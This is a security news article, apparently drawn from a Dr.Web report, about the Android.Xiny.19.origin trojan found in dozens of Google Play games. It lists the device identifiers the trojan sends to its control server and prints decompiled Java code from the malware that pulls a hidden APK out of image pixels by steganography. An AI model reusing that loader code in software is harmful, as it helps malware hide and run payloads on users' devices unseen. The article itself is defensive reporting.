Researcher Found Dozens of Games on Google PlayStore Infected By Trojan

Russian anti-virus company Dr Web published a blog post about Android.Xiny.19.origin, malware which has incorporated itself into more than 60 Android-based games developed by Conexagon Studio, Fun Color Games, BILLAPPS, and some 30 other companies. 








This new Android trojan that has targeted dozens of games in the official Google Play Store relies on steganography to dynamically run arbitrary APK files.

If you have download and use Android gaming applications on your device from these developers, then this part might frighten you slightly.

The Trojan is designed to download, install, and run programs upon receiving a command from cybercriminals. Besides, it can display annoying advertisements.

The infection process begins as soon as the user begins playing the game, the Trojan is performing its malicious activity.

Android.Xiny.19.origin  

Android.Xiny.19.origin sends the following information to the command and control server:
  • IMEI identifier
  • IMSI identifier
  • Information about the mobile operator
  • Presence of a memory card in a device
  • Country
  • Language
  • MAC address
  • Version of the operating system
  • Package name and a version of an application that the Trojan is incorporated into
  • Presence of the malicious application in the system folder
The Trojan can execute the following actions:
  • Displays annoying advertisements
  • Downloads applications and prompts a user to install various software
  • Installs and deletes programs if root access is available on a device
  • Launches arbitrary apk files hidden in images received from the C&C server
The way apk files are launched looks as follows: Android.Xiny.19.origin downloads a specially created image, which contains the corresponding file object hidden with the help of steganography, from the server. Then the Trojan retrieves the apk file using a special algorithm:

Code Expand source
package com.wch.c_direct.encrypt.logic;
import android.graphics.Bitmap;
import android.graphics.BitmapFactory;
import com.wch.c_direct.logic.a;
import java.io.InputStream;
import java.util.Arrays;
public final class BitmapDecryptor {
public static byte[] decrypt(InputStream inputStream) {
int i5;
int i = 4;
int i1 = 8;
a.a();
Bitmap bitmap0 = BitmapFactory.decodeStream(inputStream);
bitmap0.setHasAlpha(true);
byte[] buffer1 = new byte[i1];
int i2 = 0;
int i3 = 0;
int i4 = 0;
while(i2 < buffer1.length) {
i5 = bitmap0.getPixel(i4, i3);
buffer1[i2] = ((byte)(i5 >> 16 & 15));
if(i2 + 1 < i1) {
buffer1[i2 + 1] = ((byte)(i5 >> 8 & 15));
}
if(i2 + 2 < i1) {
buffer1[i2 + 2] = ((byte)(i5 & 15));
}
++i4;
if(i4 == bitmap0.getWidth()) {
++i3;
i4 = 0;
}
i2 += 3;
}
byte[] buffer2 = BitmapDecryptor.a(buffer1);
i2 = 0;
i3 = 0;
while(i2 < i) {
i3 = i3 << 8 | buffer2[i2] & 255;
++i2;
}
buffer1 = new byte[i3 * 8 / 4];
i2 = 0;
i3 = 0;
i4 = 0;
while(i2 < buffer1.length) {
i5 = bitmap0.getPixel(i4, i3);
buffer1[i2] = ((byte)(i5 >> 16 & 15));
if(i2 + 1 < buffer1.length) {
buffer1[i2 + 1] = ((byte)(i5 >> 8 & 15));
}
if(i2 + 2 < buffer1.length) {
buffer1[i2 + 2] = ((byte)(i5 & 15));
}
++i4;
if(i4 == bitmap0.getWidth()) {
++i3;
i4 = 0;
}
i2 += 3;
}
byte[] decrypted = BitmapDecryptor.a(buffer1);
bitmap0.recycle();
return Arrays.copyOfRange(decrypted, i, decrypted.length);
}
private static byte[] a(byte[] inBuffer) {
a.a();
byte[] outBuffer = new byte[inBuffer.length / 2];
int i;
for(i = 0; i < outBuffer.length; ++i) {
int i1;
for(i1 = 0; i1 < 2; ++i1) {
outBuffer[i] = ((byte)(outBuffer[i] << 4 | inBuffer[i * 8 / 4 + i1]));
}
}
return outBuffer;
}
}
After that, the malicious application loads the file into RAM of the infected device using the DexClassLoader class.


For Now, Dr.Web says that Google has been notified about the issue & failed to take down the apps it reported as infected with Android.Xiny.
So Users just be careful before downloading any apps from PlayStore unless you have a Anti-Virus Program installed on your device.

Source: Dr.Web